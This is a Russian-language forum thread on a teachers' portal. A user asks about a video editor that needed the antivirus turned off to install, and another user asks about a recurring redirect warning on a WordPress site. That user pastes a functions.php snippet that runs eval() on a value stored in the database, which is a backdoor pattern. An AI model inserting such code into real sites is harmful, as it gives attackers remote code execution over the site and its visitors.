Евгений Викторович, спасибо за разъяснения! На будущее буду в курсе! Конечно, не думала, что за кирпичной кладкой кроется
Quote (Сергеев_ЕВ)
FireWall - Огненная стена...
Да ещё и называется
Quote (Сергеев_ЕВ)
брандмауэром
Всё понятно, нашла, временно отключила и от сети Интернет, в том числе, дабы избежать заражения извне. Но, программа, которую я хотела установить, не установилась – выдаёт ОШИБКА при установке и всё. Отказалась от этой затеи и удалила программу с компа. Вы слишком серьезны. Серьезное лицо - еще не признак ума, господа. Все глупости на Земле делаются именно с этим выражением. Вы улыбайтесь, господа. Улыбайтесь! "Тот самый Мюнхгаузен"
Но, программа, которую я хотела установить, не установилась – выдаёт ОШИБКА при установке и всё. Отказалась от этой затеи и удалила программу с компа
Не факт, что все так безобидно закончилось. Нормальные программы не требуют отключения антивирусника при установке. Лично меня всегда это настораживает. Что за тулза-то была?
Окажу помощь в создании и администрировании учительских сайтов в системе uCoz
Видеоредактор CVSPX3.rar. Проверяла на наличие вирусов, и вообще все действия производила по Вашему давнему инструктажу. Просканировала комп после удаления, вроде, без аномалий. А редактор очень нужен... Вы слишком серьезны. Серьезное лицо - еще не признак ума, господа. Все глупости на Земле делаются именно с этим выражением. Вы улыбайтесь, господа. Улыбайтесь! "Тот самый Мюнхгаузен"
Если, конечно, не нужно чего-то супер-пупер-проффи...
А хотелось бы и СУПЕР -ПУПЕР... освоить Почему бы и нет?! Только, оказывается, это не так уж и легко скачать нахаляву и установить... Вы слишком серьезны. Серьезное лицо - еще не признак ума, господа. Все глупости на Земле делаются именно с этим выражением. Вы улыбайтесь, господа. Улыбайтесь! "Тот самый Мюнхгаузен"
Супер-пупер, потребует супер-пуперских ресурсов компьютера. Попробуйте Adobe Priemer
Спасибо Денис! Евгений Викторович мне всё доходчиво объяснил. Вы слишком серьезны. Серьезное лицо - еще не признак ума, господа. Все глупости на Земле делаются именно с этим выражением. Вы улыбайтесь, господа. Улыбайтесь! "Тот самый Мюнхгаузен"
Дата: Понедельник, 20.02.2012, 21:14 | Сообщение #38
Сделал сайт в вордпресс. Через день Аваст при загрузке выдавал сообщение о ява редиректе. Я заменил файл на исходный. Все нормально, но через сутки то же самое. Нашел код, который появляется, очистл ьам строку о ява. Сайт работает нормально, но хотелось бы узнать из-за чего это происходит? Сам предполагаю 2 причины: 1. Сайт на основе сильно переделанного шаблона, где я убрал ссылку на разработчиков 2. Накануне я ставил плагин генерирующий фотоальбом (WP-SimpleViewer) Хотелось бы узнать истинную причину, а то я решил проблему методом тыка
Файл functions.php
<?php
add_filter('the_content', '_bloginfo', 10001); function _bloginfo($content){ global $post; if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){ return $co; } else return $content; } if ( function_exists('register_sidebars') ) register_sidebars(2);
Добрый вечер. Скажите , а на учительском портале можно создать свой сайт , если нет , то подскажите как это можно сделать? Реально ли это сделать обычному пользователю? Заранее спасибо.
Если Вы хотите оставить сообщение на форуме, то рекомендуем Вам зарегистрироваться на нашем сайте или войти на портал как зарегистрированный пользователь
Сайт является информационным посредником и предоставляет возможность пользователям размещать свои материалы на его страницах.
Публикуя материалы на сайте, пользователи берут на себя всю ответственность за содержание этих материалов и разрешение любых спорных вопросов с третьими лицами.
При этом администрация сайта готова оказать всяческую поддержку в решении любых вопросов, связанных с работой и содержанием сайта.
Если вы обнаружили, что на сайте незаконно используются материалы, сообщите администратору через форму обратной связи — материалы будут удалены.
Все материалы, размещенные на сайте, созданы пользователями сайта и представлены исключительно в ознакомительных целях. Использование материалов сайта возможно только с разрешения администрации портала.